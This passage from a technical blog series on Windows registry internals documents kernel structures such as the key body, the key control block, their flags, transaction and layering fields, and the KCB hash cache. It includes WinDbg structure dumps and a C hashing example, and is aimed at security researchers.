CM_HIVE_IS_VIRTUALIZABLE: accesses to this hive may be subject to registry virtualization. As far as I know, the only hive with this flag set is currently HKLM\SOFTWARE, which seems in line with the official documentation.
CM_HIVE_APP_HIVE: this is an app hive, i.e. it was loaded under \Registry\A with the REG_APP_HIVE flag set.
CM_HIVE_PROCESS_PRIVATE: this hive is private to the loading process, i.e. it was loaded with the REG_PROCESS_PRIVATE flag set.
CM_HIVE_MUST_BE_REORGANIZED: the hive fragmentation threshold (by default 1 MiB) has been exceeded, and the hive should undergo the reorganization process at the next opportunity. The flag is simply a means of communication between the CmCheckRegistry and CmpReorganizeHive internal routines, both of which execute during hive loading.
CM_HIVE_DIFFERENCING_WRITETHROUGH: this is a delta hive loaded in the writethrough mode, which technically means that the DIFF_HIVE_WRITETHROUGH flag was specified in the DiffHiveFlags member of the VRP_LOAD_DIFFERENCING_HIVE_INPUT structure, as discussed in Part 4.
CM_HIVE_CLOUDFILTER_PROTECTED: new flag added in December 2024 as part of the fix for CVE-2024-49114. It indicates that the hive file has been protected against being converted to a Cloud Filter placeholder by setting the "$Kernel.CFDoNotConvert" extended attribute (EA) on the file in CmpAdjustFileCFSafety.
This concludes the documentation of the hive descriptor structure, arguably the largest and most complex object in the Windows registry implementation.
Key structures
The second most important objects in the registry are keys. They can be basically thought of as the essence of the registry, as nearly every registry operation involves them in some way. They are also the one and only registry element that is tightly integrated with the Windows NT Object Manager. This comes with many benefits, as client applications can operate on the registry using standardized handles, and can leverage automatic security checks and object lifetime management. However, this integration also presents its own challenges, as it requires the Configuration Manager to interact with the Object Manager correctly and handle its intricacies and edge cases securely. For this reason, internal key-related structures play a crucial role in the registry implementation. They help organize key state in a way that simplifies keeping it up-to-date and internally consistent. For security researchers, understanding these structures and their semantics is invaluable. This knowledge enables you to quickly identify bugs in existing code or uncover missing handling of unusual but realistic conditions.
The two fundamental key structures in the Windows kernel are the key body (_CM_KEY_BODY) and key control block (_CM_KEY_CONTROL_BLOCK). The key body is directly associated with a key handle in the NT Object Manager, similar to the role that the _FILE_OBJECT structure plays for file handles. In other words, this is the initial object that the kernel obtains whenever it calls ObReferenceObjectByHandle to reference a user-supplied handle. There may concurrently exist a number of key body structures associated with a single key, as long as there are several programs holding active handles to the key. Conversely, the key control block represents the global state of a specific key and is used to manage its general properties. This means that for most keys in the system, there is at most one KCB allocated at a time. There may be no KCB for keys that haven't been accessed yet (as they are initialized by the kernel lazily), and there may be more than one KCB for the same registry path if the key has been deleted and created again (these two instances of the key are treated as separate entities, with one of them being marked as deleted/non-existent). Taking this into account, the relationship between key bodies and KCBs is many-to-one, with all of the key bodies of a single KCB being connected in a doubly-linked list, as shown in the diagram below:
The following subsections provide more detail about each of these two structures.
Key body
The key body structure is allocated and initialized in the internal CmpCreateKeyBody routine, and freed by the NT Object Manager when all references to the object are dropped. It is a relatively short and simple object with the following definition:
0:kd>dt_CM_KEY_BODY
nt!_CM_KEY_BODY
+0x000Type:Uint4B
+0x004AccessCheckedLayerHeight:Uint2B
+0x008KeyControlBlock:Ptr64_CM_KEY_CONTROL_BLOCK
+0x010NotifyBlock:Ptr64_CM_NOTIFY_BLOCK
+0x018ProcessID:Ptr64Void
+0x020KeyBodyList:_LIST_ENTRY
+0x030Flags:Pos0,16Bits
+0x030HandleTags:Pos16,16Bits
+0x038Trans:_CM_TRANS_PTR
+0x040KtmUow:Ptr64_GUID
+0x048ContextListHead:_LIST_ENTRY
+0x058EnumerationResumeContext:Ptr64Void
+0x060RestrictedAccessMask:Uint4B
+0x064LastSearchedIndex:Uint4B
+0x068LockedMemoryMdls:Ptr64Void
Let's quickly go over each field:
Type: for normal keys (i.e. almost all of them), this field is set to a magic value of 0x6B793032 ('ky02'). However, for predefined keys, this is the 32-bit value of the link's target key with the highest bit set. This member is therefore used to distinguish between regular keys and predefined ones, for example in CmObReferenceObjectByHandle. Predefined keys have been now largely deprecated, but it is still possible to observe a non-standard Type value by opening a handle to one of the two last remaining ones: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Perflib\009 and CurrentLanguage under the same path.
AccessCheckedLayerHeight: a new field added in November 2023 as part of the fix for CVE-2023-36404. It is used for layered keys and contains the index of the lowest layer in the key stack that was access-checked when opening the key. It is later taken into account during other registry operations, in order to avoid leaking data from lower-layer, more restrictive keys that could have been created since the handle was opened.
KeyControlBlock: a pointer to the corresponding key control block.
NotifyBlock: an optional pointer to the notify block associated with this handle. This is related to the key notification functionality in Windows and is described in more detail in the "Key notification structures" section below.
ProcessID: the PID of the process that created the handle. It doesn't seem to serve any purpose in the kernel other than to be enumerable using the NtQueryOpenSubKeysEx system call (which requires SeRestorePrivilege, and is therefore available to administrators only).
KeyBodyList: the list entry used to link all the key bodies within a single KCB together.
Flags: a set of flags concerning the specific key body. Here's my interpretation of them based on reverse engineering:
KEY_BODY_HIVE_UNLOADED (0x1): indicates that the underlying hive of the key has been unloaded and is no longer active.
KEY_BODY_DONT_RELOCK (0x2): this seems to be a short-term flag used to communicate between CmpCheckKeyBodyAccess/CmpCheckOpenAccessOnKeyBody and the nested CmpDoQueryKeyName routine, in order to indicate that the key's KCB is already locked and shouldn't be relocked again.
KEY_BODY_DONT_DEINIT (0x4): if this flag is set, CmpDeleteKeyObject returns early and doesn't proceed with the regular deinitialization of the key body object. However, it is unclear if/where the flag is set in the code, as I personally haven't found any instances of it happening during my analysis.
KEY_BODY_DELETED (0x8): indicates that the key has been deleted since the handle was opened, and it no longer exists.
KEY_BODY_DONT_VIRTUALIZE (0x10): indicates that registry virtualization is disabled for this handle, as a result of opening the key with the (undocumented but present in SDK headers) REG_OPTION_DONT_VIRTUALIZE flag.
HandleTags: from the kernel perspective, this is simply a general purpose 16-bit storage that can be set by clients on a per-handle basis using NtSetInformationKey with the KeySetHandleTagsInformation information class, and queried with NtQueryKey and the KeyHandleTagsInformation information class. As far as I know, the kernel doesn't dictate how this field should be used and leaves it up to the registry clients. In practice, it seems to be mostly used for purposes related to WOW64 and the Registry Redirector, storing flags such as KEY_WOW64_64KEY (0x100) and KEY_WOW64_32KEY (0x200), as well as some internal ones. The WOW64 functionality is implemented in KernelBase.dll, and functions such as ConstructKernelKeyPath and LocalBaseRegOpenKey are a good starting point for reverse engineering, if you're curious to learn more. I have also observed the 0x1000 handle tag being set in the internal IopApplyMutableTagToRegistryKey kernel routine for keys such as HKLM\System\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000, but I'm unsure of its meaning.
Trans: Indicates the transactional state of the handle. If the handle is not transacted (i.e. it wasn't opened with one of RegOpenKeyTransacted or RegCreateKeyTransacted), it is set to zero. Otherwise, the lowest bit specifies the type of the transaction: 0 for KTM and 1 for lightweight transactions. The remaining bits form a pointer to the associated transaction object, either of the TmTransactionObjectType type (represented by the _KTRANSACTION structure), or of the CmRegistryTransactionType type (represented by a non-public structure that I've personally named _CM_LIGHTWEIGHT_TRANS_OBJECT).
KtmUow: if the handle is associated with a KTM transaction, this field stores the GUID that uniquely identifies it. For non-transacted and lightweight-transacted handles, the field is unused.
EnumerationResumeContext: this is part of an optimization of the subkey enumeration process of layered keys (implemented in CmpEnumerateLayeredKey). Performing full enumeration of a layered key from scratch up to the given index is a very complex task, and repeating it over and over for each iteration of an enumeration loop would be very inefficient. The resume context helps address the problem for sequential enumeration by saving the intermediate state reached at an NtEnumerateKey call with a given index, and being able to resume from it when a request for index+1 comes next. It also has the added benefit of making it possible to stop and restart the enumeration process in the scope of a single system call, which is used to pause the operation and temporarily release some locks if the code detects that the registry is particularly congested. This happens at the intersection of the CmEnumerateKey and CmpEnumerateLayeredKey functions, with the latter potentially returning STATUS_RETRY and the former resuming the operation if such a situation arises.
RestrictedAccessMask, LastSearchedIndex, LockedMemoryMdls: relatively new fields introduced in Windows 10 and 11, which I haven't looked very deeply into and thus won't discuss in detail here.
After a key handle is translated into the corresponding _CM_KEY_BODY structure using the ObReferenceObjectByHandle(CmKeyObjectType) call, typically early in the execution of a registry-related system call, there are three primary operations that are usually performed. First, the kernel does a key status check by evaluating the expression KeyBody.Flags & 9 to determine if the key is associated with an unloaded hive (flag 0x1) or has been deleted (flag 0x8). This check is essential because most registry operations are only permitted on active, existing keys, and enforcing this condition is a fundamental step for guaranteeing registry state consistency. Second, the code accesses the KeyControlBlock pointer, which provides further access to the hive pointer (KCB.KeyHive), the key's cell index (KCB.KeyCell), and other necessary fields and data structures required to perform any meaningful read/write actions on the key. Finally, the code checks the key body's Trans/KtmUow members to determine if the handle is part of a transaction, and if so, the transaction is used as additional context for the action requested by the caller. Accesses to other members of the _CM_KEY_BODY structure are less frequent and serve more specialized purposes.
Key control block
The key control block object can be thought of as the heart of the Windows kernel registry tree representation. It is effectively the descriptor of a single key in the system, and the second most important key-related object after the key node. It is always allocated from the kernel pool, and serves four main purposes:
Mirrors frequently used information from the key node to make it faster to access by the kernel code. This includes building an efficient, in-memory representation of the registry tree to optimize the traversal time when referring to registry paths.
Works as a single point of reference for all active handles to a specific key, and helps synchronize access to the key in the multithreaded Windows environment.
Represents any pending, transacted state of the registry key that has been introduced by a client, but not fully committed yet.
Represents any complex relationships between registry keys that extend beyond the internal structure of the hive. The primary example are differencing hives, which are overlaid on top of each other, and whose corresponding keys form so-called key stacks.
Blog post #2 in this series highlighted the dramatic growth of the registry codebase across successive Windows versions, illustrating the subsystem's steady expansion over the last few decades. Similarly, the size of the Key Control Block (KCB) itself has nearly doubled in time, from 168 bytes in Windows XP x64 to 312 bytes in the latest Windows 11 release. This expansion underscores the increasing amount of information associated with every registry key, which the kernel must manage consistently and securely.
The KCB structure layout is present in the PDB symbols and can be displayed in WinDbg:
0:kd>dt_CM_KEY_CONTROL_BLOCK
nt!_CM_KEY_CONTROL_BLOCK
+0x000RefCount:Uint8B
+0x008ExtFlags:Pos0,16Bits
+0x008Freed:Pos16,1Bit
+0x008Discarded:Pos17,1Bit
+0x008HiveUnloaded:Pos18,1Bit
+0x008Decommissioned:Pos19,1Bit
+0x008SpareExtFlag:Pos20,1Bit
+0x008TotalLevels:Pos21,10Bits
+0x010KeyHash:_CM_KEY_HASH
+0x010ConvKey:_CM_PATH_HASH
+0x018NextHash:Ptr64_CM_KEY_HASH
+0x020KeyHive:Ptr64_HHIVE
+0x028KeyCell:Uint4B
+0x030KcbPushlock:_EX_PUSH_LOCK
+0x038Owner:Ptr64_KTHREAD
+0x038SharedCount:Int4B
+0x040DelayedDeref:Pos0,1Bit
+0x040DelayedClose:Pos1,1Bit
+0x040Parking:Pos2,1Bit
+0x041LayerSemantics:UChar
+0x042LayerHeight:Int2B
+0x044Spare1:Uint4B
+0x048ParentKcb:Ptr64_CM_KEY_CONTROL_BLOCK
+0x050NameBlock:Ptr64_CM_NAME_CONTROL_BLOCK
+0x058CachedSecurity:Ptr64_CM_KEY_SECURITY_CACHE
+0x060ValueList:_CHILD_LIST
+0x068LinkTarget:Ptr64_CM_KEY_CONTROL_BLOCK
+0x070IndexHint:Ptr64_CM_INDEX_HINT_BLOCK
+0x070HashKey:Uint4B
+0x070SubKeyCount:Uint4B
+0x078KeyBodyListHead:_LIST_ENTRY
+0x078ClonedListEntry:_LIST_ENTRY
+0x088KeyBodyArray:[4]Ptr64_CM_KEY_BODY
+0x0a8KcbLastWriteTime:_LARGE_INTEGER
+0x0b0KcbMaxNameLen:Uint2B
+0x0b2KcbMaxValueNameLen:Uint2B
+0x0b4KcbMaxValueDataLen:Uint4B
+0x0b8KcbUserFlags:Pos0,4Bits
+0x0b8KcbVirtControlFlags:Pos4,4Bits
+0x0b8KcbDebug:Pos8,8Bits
+0x0b8Flags:Pos16,16Bits
+0x0bcSpare3:Uint4B
+0x0c0LayerInfo:Ptr64_CM_KCB_LAYER_INFO
+0x0c8RealKeyName:Ptr64Char
+0x0d0KCBUoWListHead:_LIST_ENTRY
+0x0e0DelayQueueEntry:_LIST_ENTRY
+0x0e0Stolen:Ptr64UChar
+0x0f0TransKCBOwner:Ptr64_CM_TRANS
+0x0f8KCBLock:_CM_INTENT_LOCK
+0x108KeyLock:_CM_INTENT_LOCK
+0x118TransValueCache:_CHILD_LIST
+0x120TransValueListOwner:Ptr64_CM_TRANS
+0x128FullKCBName:Ptr64_UNICODE_STRING
+0x128FullKCBNameStale:Pos0,1Bit
+0x128Reserved:Pos1,63Bits
+0x130SequenceNumber:Uint8B
I will not document each member individually, but will instead cover them in larger groups according to their common themes and functions.
Reference count
Key Control Blocks are among the most frequently referenced registry objects, as almost every persistent registry operation involves an associated KCB. These blocks are referenced in various ways: by a subkey's KCB.ParentKcb pointer, a symbolic link key's KCB.LinkTarget pointer, through the global KCB tree, via open key handles (and the corresponding key bodies), in pending transacted operations (e.g., the _CM_KCB_UOW.KeyControlBlock pointer), and so on.
For system stability and security, it's crucial to accurately track all these active KCB references.This is done using the RefCount field, the first member in the KCB structure (offset 0x0).Historically a 16-bit field, it became a 32-bit integer, and on modern systems, it is a native word size—typically 64-bits on most computers.Whenever kernel code needs to operate on a KCB or store a pointer to it, it should increment the RefCount using functions from the CmpReferenceKeyControlBlock family.Conversely, when a KCB reference is no longer needed, functions like CmpDereferenceKeyControlBlock should decrement the count.When RefCount reaches zero, the kernel knows the structure is no longer in use and can safely free it.
Besides standard reference counting, KCBs employ optimizations to delay certain memory management processes.This avoids excessive KCB allocation and deallocation when a KCB is briefly unreferenced.Two mechanisms are used: delay deref and delay close.The former delays the actual refcount decrement, while the latter postpones object deallocation even after RefCount reaches zero.Callers must use the specialized function CmpDelayDerefKeyControlBlock for the delayed dereference.
From a low-level security perspective, it's worth considering potential issues related to the reference counting.Integer overflow might seem like a possibility, but it's practically impossible due to the field's width and additional overflow protection present in the CmpReferenceKeyControlBlock-like functions.A more realistic concern is a scenario where the kernel accidentally decrements the refcount by a larger value than the number of released references.This could lead to premature KCB deallocation and a use-after-free condition.Therefore, accurate KCB reference counting is a crucial area to investigate when researching Windows for registry vulnerabilities.
Basic key information
As mentioned earlier, one of the most important types of information in the KCB is the unique identifier of the key in the hive, consisting of the _HHIVE descriptor pointer (KeyHive) and the corresponding key cell index (KeyCell). Very frequently, the kernel uses these two members to obtain the address of the key node mapping, which resembles the following pattern in the decompiled code:
Whenever some information about a key needs to be queried based on its handle, it is generally more efficient to read it from the KCB than the key node. The reason is that a pool-based KCB access requires fewer memory fetches (it avoids the cell map walk), bypasses the context switch to the Registry process, and eliminates the potential need to page in hive data from disk. Consequently, the following types of information are cached inside KCBs:
Key name, which is stored in a public _CM_NAME_CONTROL_BLOCK structure and pointed to by the NameBlock member. Every unique key name in the system has its own instance of the _CM_NAME_CONTROL_BLOCK object, which is reference-counted and shared across all KCBs of keys with that name. This is an optimization designed to prevent storing multiple redundant copies of the same string in kernel memory.
Flags, stored in the Flags member and being an exact copy of the _CM_KEY_NODE.Flags value. There is also the KcbUserFlags field that caches the value of _CM_KEY_NODE.UserFlags, and KcbVirtControlFlags, which caches the value of _CM_KEY_NODE.VirtControlFlags. The semantics of all of these bitmasks were discussed in Part 5.
Security descriptor, stored in a separate _CM_KEY_SECURITY_CACHE structure and pointed to by CachedSecurity.
Subkey count, stored in the SubKeyCount field. It expresses the cumulative number of the key's stable and volatile subkeys, i.e. it is equal to the sum of _CM_KEY_NODE.SubKeyCounts[0] and SubKeyCounts[1].
Value list, stored in the ValueList structure of type _CHILD_LIST, and equivalent to _CM_KEY_NODE.ValueList.
Key limits, represented by KcbMaxNameLen, KcbMaxValueNameLen and KcbMaxValueDataLen. They correspond to the key node fields with the same names without the "Kcb" prefix.
Fully qualified path, stored in FullKCBName. It is lazily initialized in the internal CmpConstructAndCacheName function, either when resolving a symbolic link, or as a result of calling the documented CmCallbackGetKeyObjectID API. A previously initialized path may be marked as stale by setting FullKCBNameStale (the least significant bit of the FullKCBName pointer).
It is essential for system security that the information found in KCBs is always synchronized with their key node counterparts. This is one of the most fundamental assumptions of the Windows registry implementation, and failure to guarantee it typically results in memory corruption or other severe security vulnerabilities.
Extended flags
In addition to the flags fields that simply mirror the corresponding values from the key node, like Flags, KcbUserFlags and KcbVirtControlFlags, there is also a set of extended flags that are KCB-specific. They are stored in the following fields:
+0x008ExtFlags:Pos0,16Bits
+0x008Freed:Pos16,1Bit
+0x008Discarded:Pos17,1Bit
+0x008HiveUnloaded:Pos18,1Bit
+0x008Decommissioned:Pos19,1Bit
+0x008SpareExtFlag:Pos20,1Bit
[...]
+0x040 DelayedDeref : Pos 0, 1 Bit
+0x040 DelayedClose : Pos 1, 1 Bit
+0x040 Parking : Pos 2, 1 Bit
For the eight explicitly defined flags, here's a brief explanation:
Freed: the KCB has been freed, but the underlying pool allocation may still be alive as part of the CmpFreeKCBListHead (older systems) or CmpKcbLookaside (Windows 10 and 11) lookaside lists.
Discarded: the KCB has been unlinked from the global KCB tree and is not available for name-based lookups, but there may still be active references to it via open handles. It is typically set for keys that have been deleted, and for old instances of keys that have been renamed.
HiveUnloaded: the underlying hive has been unloaded.
Decommissioned: the KCB is no longer used (its reference count dropped to zero) and it is ready to be freed, but it hasn't been freed just yet.
SpareExtFlag: as the name suggests, this is a spare bit that may be associated with a new flag in the future.
DelayedDeref: the key is subject to a "delayed deref" mechanism, due to having been dereferenced using CmpDelayDerefKeyControlBlock instead of CmpDereferenceKeyControlBlock. This serves to defer the actual dereferencing of the KCB by some time, anticipating its near-future need and thus avoiding a redundant free-allocate sequence.
DelayedClose: the key is subject to a "delayed close" mechanism, which is similar to delayed deref, but it involves delaying the freeing of a KCB structure even if its refcount has dropped to zero.
Parking: the purpose of this bit is unclear, and it seems to be currently unused.
Last but not least, the ExtFlags member stores a further set of flags, which can be expressed as the following enum:
enum_CM_KCB_EXT_FLAGS
{
CM_KCB_NO_SUBKEY=0x1,
CM_KCB_SUBKEY_ONE=0x2,
CM_KCB_SUBKEY_HINT=0x4,
CM_KCB_SYM_LINK_FOUND =0x8,
CM_KCB_KEY_NON_EXIST=0x10,
CM_KCB_NO_DELAY_CLOSE=0x20,
CM_KCB_INVALID_CACHED_INFO=0x40,
CM_KCB_READ_ONLY_KEY=0x80,
CM_KCB_READ_ONLY_SUBKEY = 0x100,
};
Let's break it down:
CM_KCB_NO_SUBKEY, CM_KCB_SUBKEY_ONE, CM_KCB_SUBKEY_HINT: these flags are currently obsolete, and were originally related to an old performance optimization. CM_KCB_NO_SUBKEY indicated that the key had no subkeys. CM_KCB_SUBKEY_ONE indicated that the key had exactly one subkey, and its 32-bit hint value was stored in KCB.HashKey. Finally, CM_KCB_SUBKEY_HINT indicated that the hints of all subkeys were stored in a dynamically allocated buffer pointed to by KCB.IndexHint. According to my analysis, none of the flags seem to be used in modern versions of Windows, even though their related fields in the KCB structure still exist.
CM_KCB_SYM_LINK_FOUND: indicates that the key is a symbolic link whose target KCB has already been resolved during a previous access, and is cached in KCB.CachedChildList.RealKcb (older systems) or KCB.LinkTarget (Windows 10 and 11). It is an optimization designed to speed up the process of traversing symlinks, by performing the path lookup only once and later referring directly to the cached KCB where possible.
CM_KCB_KEY_NON_EXIST: this is another deprecated flag that existed in historical implementations of the registry, but doesn't seem to be used anymore.
CM_KCB_NO_DELAY_CLOSE: indicates that the key mustn't be subject to the "delayed close" mechanism, and instead should be freed as soon as all references to it are dropped.
CM_KCB_INVALID_CACHED_INFO: this flag simply indicates that the IndexHint/HashKey/SubKeyCount fields contain out-of-date information that shouldn't be relied on.
CM_KCB_READ_ONLY_KEY: this key is designated as read-only and, therefore, is not modifiable. The flag can be set by using the undocumented NtLockRegistryKey system call, which can only be called from kernel-mode. Shout out to James Forshaw who wrote an interesting post about it on his blog.
CM_KCB_READ_ONLY_SUBKEY: the exact meaning and usage of the flag is unclear, but it appears to be enabled for keys with at least one descendant subkey marked as read-only.Specifically, the internal CmLockKeyForWrite function (the main routine behind NtLockRegistryKey's logic) sets it iteratively for every parent key of the read-only key, up to and including the hive's root.
Key body list
To optimize access, the KCB stores the first four key body handles in the KeyBodyArray for fast, lockless access. The KeyBodyListHead field maintains the head of a doubly-linked list for any additional handles.
KCB lock
The KcbPushlock member within the KCB structure is a lock used to synchronize access to the key during various registry system calls. This lock is passed to standard kernel pushlock APIs, such as ExAcquirePushLockSharedEx, ExAcquirePushLockExclusiveEx, and ExReleasePushLockEx
Transacted state
The key control block is central to managing the transacted state of registry keys, maintaining pending changes in memory before they are committed to the hive. Several fields within the KCB are specifically dedicated to this function:
KCBUoWListHead: This field is a list head that anchors a list of Unit of Work (UoW) structures. Each UoW represents a specific action taken within a transaction, such as creating, deleting a key or setting or deleting a value. This list allows the system to track all pending transactional operations related to a particular key, and it is crucial for ensuring atomicity, as it records the operations that must be applied or rolled back as a single unit.
TransKCBOwner: This field is used to identify the transaction object that "owns" the key. It is set on the KCBs of transactionally created keys, and signifies that the key is currently only visible in the context of the specific transaction. Once the transaction commits, this field is cleared, and the key becomes visible in the global registry tree.
KCBLock and KeyLock: Two so-called intent locks of type _CM_INTENT_LOCK, which are used to ensure that no two transactions can be associated with a single key if their respective operations could invalidate each other's state. According to my understanding, KCBLock protects the consistency of the KCB in this regard, and KeyLock protects the key node. The !reg ixlock WinDbg command is designed to display the internal state of these locks.
TransValueCache: This field is a structure that caches value entries associated with a particular KCB, if at least one of its values has been modified in an active transaction. Before a value is set, modified or deleted within a transaction for the first time, a copy of the current value list is taken and stored here. When a transaction is committed, the TransValueCache state is applied back to the key's persistent value list. On rollback, the list is simply discarded.
TransValueListOwner: This field is a pointer to a transaction that currently "owns" the TransValueCache. At any given time, for each key, there may be at most one active transaction that has any pending operations involving the key's values.
These fields collectively form the core transaction management within the Windows Registry. Ever since their introduction in Windows Vista, they need to be correctly handled as part of every registry action, be it a read/write one, a transacted/non-transacted one etc. This is because the kernel must potentially incorporate any transacted state in any information queries, and must similarly pay attention not to allow the existence of two contradictory transactions at the same time, and not to allow a non-transacted operation to break any assumptions of an active transaction without invalidating it first. And any bugs related to managing the transacted state may have significant security implications, with some interesting examples being CVE-2023-21748 and CVE-2023-23420. The specific structures used to store the transacted state, such as _CM_TRANS or _CM_KCB_UOW, are discussed in more detail in the "Transaction structures" section below.
Layered key state
Layered keys were introduced in Windows 10 version 1607 to support containerisation through differencing hives. Because overlaying hives on top of each other is primarily a runtime concept, the Key Control Block (KCB) is the natural place to hold the state related to this feature, and there are three main members involved in this process:
LayerSemantics: This 2-bit field indicates the state of a key within the layering system. It is an exact copy of the key's _CM_KEY_NODE.LayerSemantics value, cached in KCB for easier/quicker access. For a detailed overview of its possible values, please refer to Part 5.
LayerHeight: This field specifies the level of the key within the differencing hive stack. A higher LayerHeight indicates that the key is higher up in the stack of layered hives, and a value of zero is used for base hives (i.e. normal non-differencing hives loaded on the host system).
LayerInfo: This is a pointer to a _CM_KCB_LAYER_INFO structure, which describes the key's position within the stack of differencing hives. Among other things, it contains a pointer to the lower layer on the key stack, and the head of a list of layers above the current one.
The specifics of the structures associated with this functionality are discussed in the "Layered keys" section below.
KCB tree structure
While key bodies are a common way to access KCB structures, they're not the only method. They are integral when you have an open handle to a key, as operations on the handle follow the handle → key body → KCB translation path.However, looking up keys by name or path is also crucial.Whether a key is opened or created, it relies on either an existing handle and a relative path (single subkey name or a longer path with backslash-separated names), or an absolute path starting with "\Registry\".In this scenario, the kernel needs to quickly check if a KCB exists for the given key and to obtain its address if it does.To achieve this, KCBs are organized into their own tree structure, which the kernel can traverse. The tree is rooted in CmpRegistryRootObject (specifically CmpRegistryRootObject->KeyControlBlock, as CmpRegistryRootObject itself is the key body representing the \Registry key), and mirrors the current registry layout from a high-level perspective.
Let's highlight several key points:
KCB Existence: There's no guarantee that a corresponding KCB exists for every registry key.KCBs are allocated lazily only when a key is opened, created, or when a KCB that depends on the one being created is about to be allocated.
Consistent KCB Tree Structure: The KCB tree structure is always consistent.If a KCB exists for a key, then KCBs for all its ancestors up to the root \Registry key must also exist.
Cached Information in KCBs: KCBs contain cached information from the key node, plus additional runtime information that may not yet be in the hive (e.g., pending transactions).Before performing any operation on a key, it's crucial to consult its KCB.
KCB Uniqueness: At any given time, there can be only one KCB corresponding to a specific key attached to the tree.It's possible for multiple KCBs of the same key to exist in memory, but only if some of them correspond to deleted instances, in which case they are no longer visible in the global tree (only through the handles, until they are closed).Before creating a new KCB, the kernel should always ensure that there isn't an existing one, and if there is, use it.Failing to maintain this invariant can lead to severe consequences, as illustrated by CVE-2023-23420.
KCB Tree and Hives: The KCB tree combines key descriptors from different hives and therefore must implement support for "exit nodes" and "entry nodes", as described in the previous blog post.Both exit and entry nodes have corresponding KCBs that can be viewed and analyzed in WinDbg.Resolving transitions between exit and entry nodes generally involves reading the (_HHIVE*, root cell index) pair from the exit node and then locating and navigating to the corresponding KCB in the destination hive.To speed up this process, the kernel uses an optimization that sets the CM_KCB_SYM_LINK_FOUND flag (0x8) in the exit node's KCB and stores the entry node's KCB address in KCB.LinkTarget, simulating a resolved symbolic link and avoiding the need to look up the entry's KCB every time the key is traversed.In the diagram above, entry keys are marked in blue, exit nodes in orange, and the special connection between them by the connector with black squares.
Key Depth: Every open key in the system has a depth in the global tree, representing the number of nesting levels separating it from the root.This value is stored in the TotalLevels field.For example, the root key \Registry has a depth of 1, and the key \Registry\Machine\Software\Microsoft\Windows has a depth of 5.
Parent KCB Pointer: Every initialized KCB structure (whether attached to the tree or not) contains a pointer to its parent KCB in the ParentKcb field.The only exception is the global root \Registry, for which this pointer is NULL.
Now that we understand how the KCB tree works conceptually, let's examine how it is represented in memory.Interestingly, the KCB structure itself doesn't store a list of its subkeys.Instead, it relies on a simple 32-bit hash of the text string for fast lookups by name.The hash is calculated by multiplying successive characters of the string by powers of 37, where the first character is multiplied by the highest power and the last by the lowest (370, which is 1).This allows for a straightforward iterative implementation, shown below in C code:
uint32_tHashString(conststd::string&str){
uint32_thash=0;
for(size_ti=0;i<str.size();i++){
hash=hash*37+toupper(str[i]);
}
returnhash;
}
Some example outputs of the algorithm are:
HashString("Microsoft")=0x7f00cd26
HashString("Windows")=0x2f7de68b
HashString("CurrentVersion")=0x7e25f69d
To calculate the hash of a path with multiple components, the same algorithm steps are repeated.However, in this case, the hashes of the successive path parts are treated similarly to the letters in the previous example.Therefore, the following formula is used to calculate the hash of the full "Microsoft\Windows\CurrentVersion" path:
The hash value calculated for each key, based on its path relative to the hive's root, is stored in KCB.ConvKey.Hash.Consequently, the hash value for the standard system key HKLM\Software\Microsoft\Windows\CurrentVersion is 0x86a158ea.
Every hive has a directory of the KCBs within it, structured as a hashmap with a fixed number of buckets.Each bucket comprises a linked list of the KCBs located there.Internally, this directory is referred to as the "KCB cache" and is represented by the following two fields in the _CMHIVE structure:
+0x670KcbCacheTable:Ptr64_CM_KEY_HASH_TABLE_ENTRY
+0x678KcbCacheTableSize:Uint4B
KcbCacheTable is a pointer to a dynamically allocated array of _CM_KEY_HASH_TABLE_ENTRY structures, and KcbCacheTableSize specifies the number of buckets (i.e., the number of elements in the KcbCacheTable array).In practice, the size of this KCB cache is 128 buckets for the virtual \Registry hive, 512 for the vast majority of hives loaded in the system, and 1024 for two specific system hives: HKLM\Software and HKLM\System. Given a specific key with a name hash denoted as ConvKey, its KCB can be found in the cache bucket indexed as follows:
// Kcb can be found in Hive->KcbCacheTable[CacheIndex]
//
The operation of translating a key's path hash to its KCB cache table index (excluding the modulo KcbCacheTableSize step) is called "finalization". There's even a WinDbg helper command that can perform this action for us: !reg finalize.We can test it on the hash we calculated for the "Microsoft\Windows\CurrentVersion" path:
0:kd>!regfinalize0x86a158ea
FinalizedHashforHash=0x86a158ea:0xc2c65312
So, the finalized hash is 0xc2c65312, and since the KCB cache hive size of the SOFTWARE hive is 1024, this means that the index of the HKLM\Software\Microsoft\Windows\CurrentVersion key in the array will be the lowest 10 bits, or 0x312.We can verify that our calculations are correct by finding the SOFTWARE hive in memory and listing the keys located in its individual buckets:
As we can see, our calculations have been proven to be accurate.We could achieve a similar result with the !reg hashindex command, which takes the address of the _HHIVEobject and the ConvKey for a given key, and then prints out information about the corresponding bucket.
Within a single bucket in the KCB cache, all the KCBs are linked together in a singly-linked list starting at the _CM_KEY_HASH_TABLE_ENTRY.Entry pointer.The subsequentelements are accessible through the _CM_KEY_HASH.NextHash field, which points to the KCB.KeyHash structure in the next KCB on the list.A diagram of this data structure is shown below:
Now that we understand how the KCB objects are internally organized, let's examine how name lookups are implemented.Suppose we want to take a single step through a path and find the KCB of the next subkey based on its parent KCB and the key name. The process is as follows (assuming the parent is not an exit node):
Get the pointer to the hive descriptor on which we are currently operating from ParentKcb->KeyHive.
Calculate the hash of the subkey name based on its full path relative to the hive in which it is located.
Calculate the appropriate index in the KCB cache based on the name hash and iterate through the linked list, comparing:
The hash of the key name.
The pointer to the parent KCB.
If both of the above match, perform a full comparison of the key name.If it matches, we have found the subkey.
The process is particularly interesting because it is not based on directly iterating through the subkeys of a given key, but instead on iterating through all the keys in the particular cache bucket. Thanks to the use of hashing, the vast majority of checks of potential candidates for the sought-after subkey are reduced to a single comparison of two 32-bit numbers, making the whole process quite efficient. The performance is mostly dependent on the total number of keys in the hive and the number of hash collisions for the specific cache index.
If you'd like to dive deeper into the implementation of KCB tree traversal, I recommend analyzing the internal function CmpFindKcbInHashEntryByName, which performs a single step through the tree as described above. Another useful function to analyze is CmpPerformCompleteKcbCacheLookup, which recursively searches the tree to find the deepest KCB object corresponding to one of the elements of a given path.
For those experimenting in WinDbg, here are a few useful commands related to KCBs and their trees:
!reg findkcb: This command finds the address of the KCB in the global tree that corresponds to the given fully qualified registry path, if it exists.
!reg querykey: Similar to the command above, but in addition to providing the KCB address, it also prints the hive descriptor address, the corresponding key node address, and information about subkeys and values of the given key.
